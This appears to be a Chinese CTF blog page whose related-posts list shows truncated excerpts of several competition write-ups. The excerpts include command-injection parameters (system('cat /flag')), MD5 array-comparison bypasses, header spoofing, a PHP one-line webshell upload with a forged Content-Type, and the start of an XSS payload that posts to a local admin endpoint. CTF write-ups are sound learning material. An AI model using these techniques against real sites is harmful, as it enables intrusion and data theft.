?CTF-WP
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Yxing!
相关推荐
2025-07-14
0xGame-WP
...
2025-06-07
CMCTF-WP
WEBpop<?phpclass A1{ public $a1;}class A2{ public $a2 = '10086';}class A3{ public $a3;}class A4{ public $a4;}$a=new A1();$a->a1=new A2();$a->a1->a2=new A3();$a->a1->a2->a3=new A4();echo...
2025-01-23
BaseCTF-WP
2024HTTP 是什么呀常规的GET,POST传参,改cookie,referer,UA,IP,注意这里如果是GET传参要传入%00,就要先url编码一次,即传入%2500,因为浏览器会自动进行一次url解码 GET /?basectf=we1c%2500me POST Base=fl@gCookie: c00k13=i can't eat itUser-Agent: BaseReferer: BaseX-Forwarded-For:127.0.0.1 base64解码即可 喵喵喵´•ﻌ•`直接GET传参 DT=system('ls /');DT=system('cat /flag'); md5绕过欸直接数组绕过即可,注意第二层为强比较,也可用数组绕过 GET:name[]=1&name2[]=2Post:password[]=3&password2[]=4 A Dark Room源码 upload写个一句话木马存为1.php上传,bp抓包修改文件类型为Content-Type:...
2025-04-26
ACTF-WP
WEBnot so web 1题目先随便注册登录进入后base64解码得到源码 import base64, json, timeimport os, sys, binasciifrom dataclasses import dataclass, asdictfrom typing import Dict, Tuplefrom secret import KEY, ADMIN_PASSWORDfrom Crypto.Cipher import AESfrom Crypto.Util.Padding import pad, unpadfrom flask import ( Flask, render_template, render_template_string, request, redirect, url_for, flash, session,)app = Flask(__name__)app.secret_key = KEY@dataclass(kw_only=True)class APPUser: name:...
2025-05-15
CTBUCTF-WP
WEBWelcome !! ctbuctf{we1c0me_t0_CT9UC7F2025} Sql_No_map…?原先还在自己测,结果发现目录有东西…… //index.php<?phprequire 'lib.php';header("Content-Type: text/html; charset=utf-8");$err = '';$selected_id = $_GET['id'] ?? '';$selected_article = null;// 获取文章列表$list_sql = "SELECT id, title FROM article ORDER BY id ASC"; //升序排列$list_res = db()->query($list_sql);$articles = [];while ($row = $list_res->fetch_assoc()) { $articles[]...
2025-02-03
HGAME-WP
WEBPacman直接在源码中找通关逻辑,在index.js中就可以找到,但是有两个,之前找错了,一直交没对 拿出来base64+栅栏2栏就行 MysteryMessageBoard通过弱口令爆破登录shallot用户,密码888888,然后插入xss的payload后访问/admin <script>var xhr=new XMLHttpRequest();xhr.open("POST", "http://127.0.0.1:8888/", true);xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");xhr.send("comment=" +...